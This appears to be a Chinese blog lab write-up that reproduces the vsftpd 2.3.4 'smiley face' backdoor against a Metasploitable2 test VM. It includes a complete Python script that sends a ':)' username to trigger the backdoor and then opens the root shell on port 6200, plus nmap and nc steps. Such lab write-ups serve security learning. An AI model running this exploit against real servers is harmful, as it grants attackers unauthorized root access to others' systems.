首页 > 其他分享 >笑脸漏洞复现

笑脸漏洞复现

时间:2024-10-29 22:42:39浏览次数:6  
标签:ftp shell socket FTP 笑脸 漏洞 host 复现 print

笑脸漏洞复现

本实验以Metasploitable2靶机为实验对象

在前面的实验中我们已经获取到Metasploitable2靶机的IP地址,这里不再多做赘述。

首先使用nmap -sV查看靶机目前开放的端口及其版本

image

之后在kali中创建以下python文件脚本
(来源:csdn@十门)

import socket
import time
 
def connect_to_ftp(host, port):
    try:
        # 连接到FTP服务器
        ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ftp_socket.connect((host, port))
        print(f"成功连接到FTP服务器 {host}:{port}")
        
        # 接收FTP欢迎消息
        response = ftp_socket.recv(1024).decode()
        print(f"FTP服务器响应: {response}")
 
        # 发送恶意用户名
        ftp_socket.send(b'USER hacker:)\r\n')
        time.sleep(1)
        
        # 发送密码
        ftp_socket.send(b'PASS anypassword\r\n')
        time.sleep(1)
 
        response = ftp_socket.recv(1024).decode()
        print(f"FTP响应: {response}")
        
        # 检查是否能够连接到后门shell
        return check_backdoor_shell(host)
        
    except Exception as e:
        print(f"连接FTP服务器失败: {e}")
 
def check_backdoor_shell(host):
    try:
        # 连接到6200端口,后门shell可能开启
        shell_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        shell_socket.connect((host, 6200))
        print("后门shell已打开!连接到6200端口成功。")
        
        # 向shell发送命令,获取root权限
        shell_socket.send(b'id\n')
        time.sleep(1)
        response = shell_socket.recv(1024).decode()
        print(f"从shell获得的响应: {response}")
        
        shell_socket.close()
        return True
    except Exception as e:
        print(f"连接6200端口失败: {e}")
        return False
 
if __name__ == "__main__":
    target_host = "********"  # 下载的Metasploitable2的IP地址,记得自己修改
    target_port = 21  # FTP默认端口
    connect_to_ftp(target_host, target_port)

image

在kali中启动以上脚本,发现成功连接至6200端口,至此,我们可以确定该漏洞存在
之后我们使用nc命令进行漏洞复现,连接至6200端口

image

image

今日日鞠

image

标签:ftp,shell,socket,FTP,笑脸,漏洞,host,复现,print
From: https://www.cnblogs.com/xiantan/p/18514679

相关文章

  • patchTST代码复现心得
    patchTST代码复现心得NieY,NguyenNH,SinthongP,etal.Atimeseriesisworth64words:Long-termforecastingwithtransformers[J].arXivpreprintarXiv:2211.14730,2022.代码先来预测模块defforecast(self,x_enc,x_mark_enc,x_dec,x_mark_dec):......
  • 未授权访问漏洞
    未授权访问漏洞,是在攻击者没有获取到登录权限或未授权的情况下,或者不需要输入密码,即可通过直接输入网站控制台主页面地址,或者不允许查看的链接便可进行访问,同时进行操作,它通常属于越权漏洞但在某些情况下也可以称为逻辑漏洞,检测试试一个后台或者功能抓包后删除cookie还可......
  • #渗透测试#SRC漏洞挖掘# 信息收集-Shodan进阶之未授权访问
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章阅读。                            ......
  • vins-fusion gpu, docker, opencv4.5.4(cuda) 复现
    代码:https://gitee.com/zheng-yongjie/vins-fusion-gpu-cv4?skip_mobile=true硬件:jetsonxaviernx,系统20.04nvcc-V可查看cuda版本本文在docker里面复现1.opencvcuda安装root@ubuntu:~#pwd/rootwget-Oopencv-4.5.4.ziphttps://github.com/opencv/opencv/archi......
  • 黑客常用Linux漏洞扫描工具(含安装步骤)
    第一款:Trivy概述Trivy是一个开源漏洞扫描程序,能够检测开源软件中的CVE。这款工具针对风险提供了及时的解释,开发人员可自行决定是否在容器或应用程序中使用该组件。常规的容器安全协议使用的是静态镜像扫描来发现漏洞,Trivy则是将漏洞扫描工具无缝合并到集成开发环境当中......
  • 【漏洞复现】时空智友ERP系统uploadStudioFile任意文件上传漏洞
    免责声明请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。一、简介时空智友ERP系统是一款基于云计算和大数据的企业资源计划管理系统,旨在......
  • Tenda路由器账号密码信息泄露漏洞
    免责声明请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。一、简介Tenda是一家中国的网络设备制造商,成立于1999年,专注于提供各种网络产品,......
  • 新接口0day全程云DocumentDocService.asmx接口存在任意文件上传漏洞
     0x01阅读须知        技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用......
  • 新接口 易宝OA-ExecuteSqlForDataSet接口存在SQL注入漏洞
    0x01阅读须知        本文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考。本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁......
  • 高校智慧平台SExcelExpErr存在SQL注入漏洞
    0x01阅读须知        本文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考。本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁......